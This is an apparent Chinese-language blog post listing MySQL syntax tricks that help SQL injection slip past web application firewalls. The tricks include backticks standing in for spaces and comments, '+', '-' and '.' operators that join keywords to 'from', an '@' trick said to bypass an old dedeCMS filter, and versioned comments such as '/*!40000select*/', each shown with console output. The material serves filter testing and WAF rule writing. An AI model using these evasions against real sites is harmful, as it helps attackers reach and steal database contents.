WAF绕过的几个技巧

本文中，笔者与大家分享了几个WAF绕过的技巧。对于一些大家都了解的技巧如：/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重造轮子。

Mysql：

tips1: 神奇的 `  (格式输出表的那个控制符)

过空格  过一些正则。

1. mysql> select`version`()  
2.     -> ;  
3. +----------------------+  
4. | `version`()          |  
5. +----------------------+  
6. | 5.1.50-community-log |  
7. +----------------------+  
8. 1 row in set (0.00 sec) 

一个更好玩的技巧，这个` 控制符可以当注释符用（限定条件）。

1. mysql> select id from qs_admins where id=1;`dfff and comment it;  
2. +----+  
3. | id |  
4. +----+  
5. |  1 |  
6. +----+  
7. 1 row in set (0.00 sec)  
8.  `>usage : where  id =’0′`’xxxxcomment on.  

tips2:神奇的“- + .”：

1. mysql> select id from qs_admins;  
2. +----+  
3. | id |  
4. +----+  
5. |  1 |  
6. +----+  
7. 1 row in set (0.00 sec)  
8.  
9. mysql> select+id-1+1.from qs_admins;  
10. +----------+  
11. | +id-1+1. |  
12. +----------+  
13. |        1 |  
14. +----------+  
15. 1 row in set (0.00 sec)  
16.  
17. mysql> select-id-1+3.from qs_admins;  
18. +----------+  
19. | -id-1+3. |  
20. +----------+  
21. |        1 |  
22. +----------+  
23. 1 row in set (0.00 sec) 

（有些人不是一直在说关键字怎么过？过滤一个from …    就是这样连起来过）

tips3: @

1. mysql> select@^1.from qs_admins;  
2. +------+  
3. | @^1. |  
4. +------+  
5. | NULL |  
6. +------+ 

这个是bypass  曾经dedeCMS filter。

或者下面这样也是可以的：

tips4：mysql function() as xxx  也可以不用as 和空格

1. mysql> select-count(id)test from qs_admins;  
2. +------+  
3. | test |  
4. +------+  
5. |   -1 |  
6. +------+  
7. 1 row in set (0.00 sec) 

tips5:/*![>5000]*/ 新构造  版本号（这个可能有些过时了。）

1. mysql> /*!40000select*/ id from qs_admins;  
2. +----+  
3. | id |  
4. +----+  
5. |  1 |  
6. +----+  
7. 1 row in set (0.00 sec)